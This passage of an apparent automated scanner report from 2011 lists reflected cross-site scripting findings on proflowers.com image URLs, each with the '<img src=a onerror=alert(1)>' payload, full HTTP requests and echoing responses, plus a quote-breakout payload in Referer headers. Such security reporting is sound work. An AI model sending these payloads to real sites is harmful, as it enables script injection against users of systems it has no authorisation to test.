User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:16 GMT
Connection: close

Unable to find /ProvideCommerce/LLYassrtperu_pnk10_TEST_PF6d67c<img src=a onerror=alert(1)>ec1cb1d74be

4.42. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload 4e4c1<img%20src%3da%20onerror%3dalert(1)>b4e9f2fec83 was submitted in REST URL parameter 9 and was echoed as 4e4c1<img src=a onerror=alert(1)>b4e9f2fec83 in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF4e4c1<img%20src%3da%20onerror%3dalert(1)>b4e9f2fec83?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:13 GMT
Connection: close

Unable to find /ProvideCommerce/LLYdlxassrtories_pnk11_PF4e4c1<img src=a onerror=alert(1)>b4e9f2fec83

4.43. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PF

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload c3599<img%20src%3da%20onerror%3dalert(1)>d8063d74a3a was submitted in REST URL parameter 9 and was echoed as c3599<img src=a onerror=alert(1)>d8063d74a3a in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PFc3599<img%20src%3da%20onerror%3dalert(1)>d8063d74a3a?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:15 GMT
Connection: close

Unable to find /ProvideCommerce/LLYdlxassrtperu_tv11_PFc3599<img src=a onerror=alert(1)>d8063d74a3a

4.44. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload 65a8a<img%20src%3da%20onerror%3dalert(1)>8a6382d71f6 was submitted in REST URL parameter 9 and was echoed as 65a8a<img src=a onerror=alert(1)>8a6382d71f6 in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF65a8a<img%20src%3da%20onerror%3dalert(1)>8a6382d71f6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:09 GMT
Connection: close

Unable to find /ProvideCommerce/LLYdlxstargazer_pnk11_PF65a8a<img src=a onerror=alert(1)>8a6382d71f6

4.45. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PF

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload c83bd<img%20src%3da%20onerror%3dalert(1)>50f64b94a0e was submitted in REST URL parameter 9 and was echoed as c83bd<img src=a onerror=alert(1)>50f64b94a0e in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PFc83bd<img%20src%3da%20onerror%3dalert(1)>50f64b94a0e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:02 GMT
Connection: close

Unable to find /ProvideCommerce/LLYroyalspring_pnk10_PFc83bd<img src=a onerror=alert(1)>50f64b94a0e

4.46. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload 312d2<img%20src%3da%20onerror%3dalert(1)>4ee798bbca6 was submitted in REST URL parameter 9 and was echoed as 312d2<img src=a onerror=alert(1)>4ee798bbca6 in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ312d2<img%20src%3da%20onerror%3dalert(1)>4ee798bbca6?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:26 GMT
Connection: close

Unable to find /ProvideCommerce/M519BRR1001210_SQ312d2<img src=a onerror=alert(1)>4ee798bbca6

4.47. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload 664e8<img%20src%3da%20onerror%3dalert(1)>005d15718af was submitted in REST URL parameter 9 and was echoed as 664e8<img src=a onerror=alert(1)>005d15718af in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF664e8<img%20src%3da%20onerror%3dalert(1)>005d15718af?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:49 GMT
Connection: close

Unable to find /ProvideCommerce/MBQ15orchpurp10_PF664e8<img src=a onerror=alert(1)>005d15718af

4.48. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 613be<img%20src%3da%20onerror%3dalert(1)>a8ba2d3b6ff was submitted in the REST URL parameter 9. This input was echoed as 613be<img src=a onerror=alert(1)>a8ba2d3b6ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF613be<img%20src%3da%20onerror%3dalert(1)>a8ba2d3b6ff?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:00 GMT
Connection: close

Unable to find /ProvideCommerce/MBQallthefrills_pnk11_PF613be<img src=a onerror=alert(1)>a8ba2d3b6ff

4.49. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dc33a<img%20src%3da%20onerror%3dalert(1)>e55e170119a was submitted in the REST URL parameter 9. This input was echoed as dc33a<img src=a onerror=alert(1)>e55e170119a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PFdc33a<img%20src%3da%20onerror%3dalert(1)>e55e170119a?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:57 GMT
Connection: close

Unable to find /ProvideCommerce/MBQassrtgerb_coralpeony11_PFdc33a<img src=a onerror=alert(1)>e55e170119a

4.50. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a266c<img%20src%3da%20onerror%3dalert(1)>f1cc77c07c5 was submitted in the REST URL parameter 9. This input was echoed as a266c<img src=a onerror=alert(1)>f1cc77c07c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PFa266c<img%20src%3da%20onerror%3dalert(1)>f1cc77c07c5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:03 GMT
Connection: close

Unable to find /ProvideCommerce/MBQassrtmums11_catalog_PFa266c<img src=a onerror=alert(1)>f1cc77c07c5

4.51. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 8217f<img%20src%3da%20onerror%3dalert(1)>bd7ea8ed212 was submitted in the REST URL parameter 9. This input was echoed as 8217f<img src=a onerror=alert(1)>bd7ea8ed212 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF8217f<img%20src%3da%20onerror%3dalert(1)>bd7ea8ed212?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:48 GMT
Connection: close

Unable to find /ProvideCommerce/MBQcarnival10_PF8217f<img src=a onerror=alert(1)>bd7ea8ed212

4.52. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fe029<img%20src%3da%20onerror%3dalert(1)>0534e1dcbe6 was submitted in the REST URL parameter 9. This input was echoed as fe029<img src=a onerror=alert(1)>0534e1dcbe6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PFfe029<img%20src%3da%20onerror%3dalert(1)>0534e1dcbe6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=86&hei=100 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:27 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxhugskiss_rbyg11_PFfe029<img src=a onerror=alert(1)>0534e1dcbe6

4.53. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e3e3e<img%20src%3da%20onerror%3dalert(1)>91af06a583c was submitted in the REST URL parameter 9. This input was echoed as e3e3e<img src=a onerror=alert(1)>91af06a583c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PFe3e3e<img%20src%3da%20onerror%3dalert(1)>91af06a583c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:14 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxjoyfulbouquet09_PFe3e3e<img src=a onerror=alert(1)>91af06a583c

4.54. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload cd0b9<img%20src%3da%20onerror%3dalert(1)>27b564570ad was submitted in the REST URL parameter 9. This input was echoed as cd0b9<img src=a onerror=alert(1)>27b564570ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PFcd0b9<img%20src%3da%20onerror%3dalert(1)>27b564570ad?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:10 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxpinksapp_pnk10_2_PFcd0b9<img src=a onerror=alert(1)>27b564570ad

4.55. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fbefa<img%20src%3da%20onerror%3dalert(1)>c7f3acc65e was submitted in the REST URL parameter 9. This input was echoed as fbefa<img src=a onerror=alert(1)>c7f3acc65e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PFfbefa<img%20src%3da%20onerror%3dalert(1)>c7f3acc65e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:04 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PFfbefa<img src=a onerror=alert(1)>c7f3acc65e

4.56. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 30a26<img%20src%3da%20onerror%3dalert(1)>47859c8e565 was submitted in the REST URL parameter 9. This input was echoed as 30a26<img src=a onerror=alert(1)>47859c8e565 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

